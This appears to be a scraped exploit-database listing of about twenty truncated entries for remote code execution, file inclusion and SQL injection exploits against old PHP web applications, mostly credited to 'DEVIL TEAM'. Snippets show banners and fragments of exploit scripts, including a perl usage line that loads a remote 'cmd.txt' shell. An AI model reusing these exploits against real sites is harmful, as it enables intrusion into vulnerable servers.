PhpCommander 3.0 - 'upload' Remote Code Execution

!/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:...

PhpCommander <= 3.0 (upload) Remote Code Execution Exploit

Exploit for unknown platform in category web applications ========================================================== PhpCommander = 3.0 upload Remote Code Execution Exploit ========================================================== !/usr/bin/php -q -d shortopentag=on ? $devilteam = " :::::::::...

PHP-Proxima 6.0 - &#039;BB_Smilies.php&#039; Local File Inclusion

source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...

PHP Proxima &lt;= v.6 completepack Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :...

pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit

Exploit for unknown platform in category web applications =============================================================== pHNews = alpha 1 templatesdir Remote Code Execution Exploit =============================================================== !/usr/bin/php -q -d shortopentag=on ? $devilteam = ...

pHNews alpha 1 - templates_dir Remote Code Execution

pHNews alpha 1 - templatesdir Remote Code Execution !/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: ::...

PHP Proxima 6 - completepack Remote Code Execution

PHP Proxima 6 - completepack Remote Code Execution !/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::...

PHP Proxima <= v.6 completepack Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================================= PHP Proxima = v.6 completepack Remote Code Execution Exploit ============================================================= !/usr/bin/php -q -d shortopentag=on ? $devilteam = "...

AlberT-EasySite 1.0a5 - &#039;PSA_PATH&#039; Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - AES: AlberT-EasySite perl exploit.pl http://site.com/AESPath/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; $sciezka = $ARGV0; $sciezkacmd = $ARGV1; $komenda = $ARGV2;...

ProManager 0.73 - &#039;note.php&#039; SQL Injection

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - proManager = 0.73 Add Admin SQL Injection Vulnerabilities + + + - Script name: proManager v.0.73 - Script site: http://sourceforge.net/projects/promanager/ + + + - Find by: Kacper a.k.a Rahim + - Contact: [email protected] - or -...

Phaos 0.9.2 - basename() Remote Command Execution

Phaos 0.9.2 - basename Remote Command Execution DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM...

Phaos 0.9.2 - &#039;basename()&#039; Remote Command Execution

DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patriots : - Leito & Leon TomZen, Gelo, Ramzes, DMX,...

SportsPHool 1.0 - &#039;mainnav&#039; Remote File Inclusion

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - SportsPHool = 1.0 mainnav Remote File Include Vulnerability + + + - Script name: SportsPHool v.1.0 - Script site: http://sourceforge.net/projects/sportsphool + + + - Find by: Kacper a.k.a Rahim + - Contact: [email protected] - or -...

SportsPHool &lt;= 1.0 (mainnav) Remote File Include Vulnerability

No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - SportsPHool = 1.0 mainnav Remote File Include Vulnerability + + + - Script name: SportsPHool v.1.0 - Script site: http://sourceforge.net/projects/sportsphool + + + - Find by: Kacper a.k.a Rahim + - Contact:...

phpCodeGenie &lt;= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability

No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie = 3.0.2 BEAUTPATH Remote File Include Vulnerability + + + - Script name: phpCodeGenie v. 3.0.2 - Script site: http://sourceforge.net/projects/phpcodegenie/ + + + - Find by: Kacper a.k.a Rahim +...

dotProject 2.0.4 - baseDir Remote File Inclusion

dotProject 2.0.4 - baseDir Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - dotProject = 2.0.4 baseDir Remote File Include Vulnerabilities + - Script name: dotProject v. 2.0.4 - Script site: http://www.dotproject.net/ + + + - Find by: Kacper a.k.a Rahim + - Contact:...

OPT Max 1.2.0 - &#039;CRM_inc&#039; Remote File Inclusion

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - OPT Outreach Project Tool = 1.2.6 CRMinc Remote File Include Vulnerabilities + + + - Script name: OPT Outreach Project Tool v. 1.2.6 - Script site: http://sourceforge.net/projects/outreach + + + - Find by: Kacper a.k.a Rahim + - Contact:...

OPT Max 1.2.0 - CRM_inc Remote File Inclusion

OPT Max 1.2.0 - CRMinc Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - OPT Outreach Project Tool = 1.2.6 CRMinc Remote File Include Vulnerabilities + + + - Script name: OPT Outreach Project Tool v. 1.2.6 - Script site: http://sourceforge.net/projects/outreach + + + -...

SAPID Gallery 1.0 - ROOT_PATH Remote File Inclusion

SAPID Gallery 1.0 - ROOTPATH Remote File Inclusion $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ SAPID Gallery = v.1 rootpath Remote File Include Vulnerability $$ Script site: http://sapid.sourceforge.net/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ...

SAPID Shop 1.2 - &#039;ROOT_PATH&#039; Remote File Inclusion

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ SAPID Shop = v.1.2 rootpath Remote File Include Vulnerability $$ Script site: http://sapid.sourceforge.net/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Find by: Kacper a.k.a Rahim $$ $$ Contact:...